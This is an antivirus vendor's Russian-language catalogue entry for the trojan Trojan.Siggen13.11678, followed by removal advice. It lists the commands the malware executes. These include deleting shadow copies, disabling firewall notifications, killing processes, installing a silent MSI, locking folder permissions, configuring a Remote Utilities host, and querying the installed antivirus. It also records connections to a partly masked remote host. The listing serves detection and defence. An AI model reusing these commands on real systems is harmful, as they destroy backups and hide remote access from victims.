Для корректной работы нашего сайта необходимо включить поддержку JavaScript в вашем браузере.
Trojan.Siggen13.11678
Добавлен в вирусную базу Dr.Web:
2021-04-24
Описание добавлено:
2021-04-26
Техническая информация
Вредоносные функции
Для затруднения выявления своего присутствия в системе
удаляет теневые копии разделов.
Запускает на исполнение
'<SYSTEM32>\taskkill.exe' /F /IM ROMServer.exe
'<SYSTEM32>\taskkill.exe' /F /IM ROMFUSClient.exe
'<SYSTEM32>\taskkill.exe' /F /IM rfusclient.exe
'<SYSTEM32>\taskkill.exe' /F /IM dllhost.exe
'<SYSTEM32>\taskkill.exe' /F /IM taskhost.exe
'<SYSTEM32>\taskkill.exe' /F /IM wininnit.exe
'<SYSTEM32>\taskkill.exe' /F /IM dInjector.exe
'<SYSTEM32>\taskkill.exe' /F /IM SysTrayRefresh.exe
'<SYSTEM32>\taskkill.exe' /F /IM winvers.exe
'<SYSTEM32>\taskkill.exe' /F /IM wiacmgr.exe
'<SYSTEM32>\taskkill.exe' /F /IM syscrb.exe
'<SYSTEM32>\taskkill.exe' /F /IM sysmxd.exe
'<SYSTEM32>\taskkill.exe' /F /IM WmiMgms.exe
'<SYSTEM32>\netsh.exe' firewall set notifications DISABLE
Завершает или пытается завершить
следующие системные процессы:
<SYSTEM32>\taskhost.exe
<SYSTEM32>\msiexec.exe
Изменения в файловой системе
Создает следующие файлы
%WINDIR%\winbiosystem\id.txt
%APPDATA%\wininnit\id.txt
%TEMP%\winautomation\1.txt
%APPDATA%\wininnit\ids2.txt
%APPDATA%\wininnit\ids.txt
%TEMP%\winautomation\all.bat
%TEMP%\winautomation\ccg35uv0q0p.tmp
%TEMP%\winautomation\activated-online-user_611106.txt
%TEMP%\winautomation\activated-online-280-103-688-022.txt
%ALLUSERSPROFILE%\1.reg
%TEMP%\winautomation\temp.bat
%TEMP%\winautomation\hide.vbs
Удаляет следующие файлы
%TEMP%\winautomation\1.txt
%TEMP%\winautomation\activated-online-user_611106.txt
%TEMP%\winautomation\activated-online-280-103-688-022.txt
%ALLUSERSPROFILE%\1.reg
%TEMP%\winautomation\all.bat
%TEMP%\winautomation\hide.vbs
Самоудаляется.
Сетевая активность
Подключается к
'un##hone.gr':21
'un##hone.gr':55503
'un##hone.gr':55511
'un##hone.gr':55956
'un##hone.gr':55014
'un##hone.gr':25
TCP
'un##hone.gr':21
'un##hone.gr':55511
'un##hone.gr':55014
'un##hone.gr':25
UDP
Другое
Ищет следующие окна
ClassName: '' WindowName: ''
ClassName: 'RegEdit_RegEdit' WindowName: ''
Создает и запускает на исполнение
'<SYSTEM32>\wscript.exe' "%TEMP%\WinAutomation\hide.vbs"
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\WinAutomation\all.bat" "' (со скрытым окном)
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\WinAutomation\temp.bat" "' (со скрытым окном)
Запускает на исполнение
'<SYSTEM32>\cmd.exe' /c pushd "%LOCALAPPDATA%\Temp" && (rd /s /q "%LOCALAPPDATA%\Temp" 2>nul & popd)
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\systray\SysTrayRefresh.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\winvervts\winverss.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\winversxs\winvers.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\WinBioSystem\ROMServer.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\WinBioSystem\ROMFUSClient.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\winbiossystem\rutserv.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\winbiossystem\rfusclient.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%ProgramFiles%\MicrosoftSystem\ProcessHacker.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%ProgramFiles%\MicrosoftSystem\PowerRun.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%CommonProgramFiles%\MicrosoftSystem\ProcessHacker.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%CommonProgramFiles%\MicrosoftSystem\PowerRun.exe"
'<SYSTEM32>\cmd.exe' /c MsiExec.exe /package "%TEMP%\WinAutomation\service.msi" /quiet
'<SYSTEM32>\msiexec.exe' /package "%TEMP%\WinAutomation\service.msi" /quiet
'<SYSTEM32>\cmd.exe' /c icacls %WINDIR%\WinBioSystem /remove:d users
'<SYSTEM32>\cmd.exe' /c netsh firewall set notifications DISABLE
'<SYSTEM32>\icacls.exe' %WINDIR%\WinBioSystem /deny users:f
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\WinAutomation\all.bat" "
'<SYSTEM32>\cmd.exe' /c sc.exe start RManService
'<SYSTEM32>\sc.exe' start RManService
'<SYSTEM32>\reg.exe' add "HKLM\SOFTWARE\Usoris\Remote Utilities Host\Host\Parameters" /v "InternetId" /t REG_BINARY /d "efbbbf3c3f786d6c2076657273696f6e3d22312e302220656e636f64696e673d225554462d38223f3e0d0a3c726d73...
'<SYSTEM32>\cmd.exe' /c TASKLIST /NH /FI "IMAGENAME eq rfusclient.exe" /FI "username eq user"
'<SYSTEM32>\tasklist.exe' /NH /FI "IMAGENAME eq rfusclient.exe" /FI "username eq user"
'<SYSTEM32>\cmd.exe' /c WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
'<SYSTEM32>\wbem\wmic.exe' /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
'<SYSTEM32>\cmd.exe' /c vssadmin delete shadows /all /quiet
'<SYSTEM32>\cmd.exe' /c regedit.exe /s %ALLUSERSPROFILE%\1.reg
'%WINDIR%\regedit.exe' /s %ALLUSERSPROFILE%\1.reg
'<SYSTEM32>\cmd.exe' /c start hide.vbs
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\svchost\svchost.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\BootSystem\7za.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wininnit\wininnit.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\taskhost\taskhost.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\dllhost\dllhost.exe"
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM ROMFUSClient.exe
'<SYSTEM32>\cmd.exe' /c sc.exe stop RManService
'<SYSTEM32>\sc.exe' stop RManService
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM rfusclient.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM dllhost.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM taskhost.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM wininnit.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM dInjector.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM SysTrayRefresh.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM winvers.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM wiacmgr.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM syscrb.exe
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM sysmxd.exe
'<SYSTEM32>\cmd.exe' /c ""%TEMP%\WinAutomation\temp.bat" "
'<SYSTEM32>\cmd.exe' /c icacls %WINDIR%\WinBioSystem /deny users:f
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM WmiMgms.exe
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%TEMP%\WinAutomation"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%ALLUSERSPROFILE%\SoftwareDistribution"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\dInject\dInjector.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimser\wimser.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimserp\wimserp.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimsert\wimsert.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimserv\wimserv.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimsern\wimsern.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimser\winver.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimserp\winverp.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimsert\winvert.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimserv\winverv.exe"
'<SYSTEM32>\cmd.exe' /c dInjector.exe /A "%WINDIR%\wimsern\winvern.exe"
'<SYSTEM32>\cmd.exe' /c taskkill /F /IM ROMServer.exe
'<SYSTEM32>\icacls.exe' %WINDIR%\WinBioSystem /remove:d users
'<SYSTEM32>\ping.exe' 127.0.0.1 -n 5
Рекомендации по лечению
Windows
macOS
Linux
Android
В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store .
Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light . Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
выключите устройство и включите его в обычном режиме.
Подробнее о Dr.Web для Android
Демо бесплатно на 14 дней
Выдаётся при установке
Поздравляем!
Обменяйте их на скидку до 50% на покупку Dr.Web.
Получить скидку
Скачайте Dr.Web для Android
Бесплатно на 3 месяца
Все компоненты защиты
Продление демо через AppGallery/Google Pay
Если Вы продолжите использование данного сайта, это означает, что Вы даете согласие на использование нами Cookie-файлов и иных технологий по сбору статистических сведений о посетителях. Подробнее
OK